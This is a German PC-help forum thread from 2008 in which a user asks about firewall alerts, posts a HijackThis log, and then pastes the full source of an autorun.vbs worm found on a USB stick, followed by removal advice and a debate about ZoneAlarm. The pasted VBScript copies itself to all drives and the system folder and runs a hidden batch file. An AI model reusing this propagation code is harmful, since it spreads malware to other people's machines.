Welcome to Computerhilfen.de, your free pc help site. Please take a look at our english website at www.computerhilfen.com where you find tips and help in english and can also ask questions in our english help board.
Die Anti-Spyware-Prüfung des Programmes brachte keine Ergebnisse.
Ich dachte erst, das sei ein Virus, aber dann habe ich mir die IPs genauer angesehen: Ich benutze eine Fritzbox, die über LAN mit meinem PC verbunden ist. Unter LAN-Verbindungen>>Netzwerkunterstützung habe ich meine IP gefunden. Das ist die Ziel-IP des Protokolls, die auf ***.***.**8.22 endet. Die Quell-IP ist die gleiche, nur endet sie auf ***.***.**8.1 Ist das etwa ein ganz normales Lebenszeichen meines Fritzbox-Routers?
Ich bedanke mich schonmal für alle Antworten. Ich bin nicht gerade ein Profi in dem Thema ^^ Sollte eine wichtige Information fehlen, um das zu klären, sagt Bescheid.
« Laatste verandering: 07.09.08, 00:01:39 door le Cauchemar »
..also normal ist es auf jedenfall nicht! Hast du dort schon mal bei Programmeinstellungen geschaut, lösch dort alle die du nicht brauchst und beachte bei anderen deren Freigabe. www.hijackthis.de mal zur Sicherheit.
« Laatste verandering: 07.09.08, 11:08:28 door copy »
OK, vielen Dank erstmal bis hierhin Mein HJT-Log: Logfile of Trend Micro HijackThis v2.0.2 Scan saved at 18:59:48, on 15.09.2008 Platform: Windows XP SP1 (WinNT 5.01.2600) MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106) Boot mode: Normal
Hmm..Internet Explorer ist angeblich schädlich. Ich glaube, ich habe den (das Original) nicht einmal installiert... Wie sollte ich jetzt vorgehen?
Habe gerade auf meinem USB-Stick eine Autorun.vbs entdeckt Bevor ich ihn vor 5 Minuten angeschlossen habe, war die Datei nicht drauf Habe die Datei mal gelöscht und den Inhalt in einer txt-Datei mit neutralem Namen gespeichert, um ihn hier zu posten:
if Year(Date)=2030 and Month(Date)=6 and Day(Date)=30 then a=WshShell.Run("autorun.bat Over" ,0,True) Set Of = CreateObject("Scripting.FileSystemObject") Set fc = Of.OpenTextFile("C:\autorun.txt", 1) mt = fc.ReadAll fc.Close if mt<>"" then msgbox decrypt(mt) end if
if Year(Date)>2030 or Month(Date)>100 then else For i=1 to 1 set Of = CreateObject("Scripting.FileSystemObject") set dir = Of.GetSpecialFolder(1)
Set dc = Of.Drives if WScript.ScriptFullName=dir&"\autorun.vbs" then isdir=true else a=WshShell.Run("autorun.bat Open" ,0,False) isdir=false end if For Each d In dc If d.DriveType = 2 Or d.DriveType = 3 or (d.DriveType = 1 and d<>"A:" and d<> "B:") Then a=WshShell.Run("autorun.bat - "&d ,0,True) if isdir then Of.CopyFile dir&"\autorun.*",d&"\",True else Of.CopyFile "autorun.*",d&"\",True end if a=WshShell.Run("autorun.bat + "&d ,0,True) End If next if isdir then wscript.sleep 60000 i=0 else a=WshShell.Run("autorun.bat - "&dir ,0,True) Of.CopyFile "autorun.*",dir&"\",True a=WshShell.Run("autorun.bat + "&dir ,0,True) End if next End if
function decrypt(dcode) dim texts dim i for i=1 to len(dcode)-4 x=i mod 5 texts=texts & chr(asc(mid(dcode,i,1))-x) next decrypt=texts end function
Wenn diese Zeilen hier unerwünscht sind, werde ich (oder ein Moderator - kommt drauf an, wer schneller ist) sie natürlich entfernen.
« Laatste verandering: 15.09.08, 19:10:46 door le Cauchemar »
System vom Internet trennen,Du hast eine Virus oder trojaner Dir per USB eingeschlept.Die vbs datei war ein bestandteil dieses virus. System von sauberem medium Booten,und untersuchen.Je nach art des schädlings ist manuelles entfernen ausreichend,ansonsten neuinstalation.
Hallo, also ich bin mit ZA voll zufrieden. Zig Tausend Rechner versuchen in andere Rechner einzudringen und das ununterbrochen 24 Std. am Tag, 7 Tage die Woche, 365 Tage im Jahr. Warum sollte sonst ZA Anfragen blocken, tja, das ist doch der Sinn einer Firewall und ich kann mir gut vorstellen, dass solche Versuche alle 10 Sec. stattfinden können. Bei einem Test der Firewall auf www.com-magazin.de habe ich festgestellt, dass ZA die wichtigen Ports geschlossen oder versteckt hat, also keine Angriffspunkte für Eindringlinge, genauso, wie es eine Firewall machen sollte...
Hallo, ach komm, ganz so sinnlos kann es nicht sein...und ich zahle nix für Programme, lediglich das BS lass ich mich etwas kosten....aber ich lass Dir deine Meinung...
seitdem ich einen Router MIT HW-FW habe , ist ZA ... gestorben ... macht viel Aufregung um nix,bei sensibler Einstellung wird jeder Ping usw bemeckert .
Hallo, naja, ich wills mal so ausdrücken, mit der Firewallfühle ich mich sicherer, ob es objektiv auch so ist, kann ich nicht so genau sagen, schliesslich bin ich kein Sicherheits Experte..., aber die bisher durchgeführten Tests bestätigen mich darin, dass ich mich auch sicherer fühlen kann...
..vieleicht bin ich damit ein Beispiel, aber kein Gutes. ..hab meine Vista Firewall off und die Zone drauf. Mal sehen was passiert, werde es Reumütig und für die Sicherheit anderer, hier oder in einem neuem Threat posten!
@copy ooo neinnn nicht du auch noch ...muss es den erst zu einem schädlings befall kommen bevor du was dagegen tust sprich ZA entfernst...zum testen tue doch in einer virutelen umgeben das testen zb mit Virtualbox... leider weiß ich nicht wo man die viren runterladen kann
aber am arbeits rechner solltest du ZA nicht benutzen das hasst du schon wahrscheinlich tausendmal gehört aber naja ist nur ein gut gemeinter rat um keine schädlings befall zu bekommen
ich hoffe du machst da was bezüglich ZA (zb entfernen )
close
Gelogd
...muss es den erst zu einem schädlings befall kommen 
)
Bookmark:
